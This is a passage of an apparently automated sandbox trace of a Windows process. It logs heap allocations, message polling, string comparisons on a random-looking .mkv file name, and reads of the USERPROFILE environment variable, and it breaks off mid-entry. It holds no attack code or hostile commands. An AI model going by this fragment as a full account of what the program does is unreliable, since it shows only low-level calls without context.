HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0149.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa61b0 [0149.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NWn0_eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wn0_eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0_eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0_eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eXN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XN3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pgA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gA63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ym.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0149.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.387] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.387] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.387] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0149.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0149.392] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0149.392] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0149.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0149.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0149.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0149.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0149.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.394] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.395] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0149.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.396] RtlAllocateHeap (HeapHandle=0x2af0000, 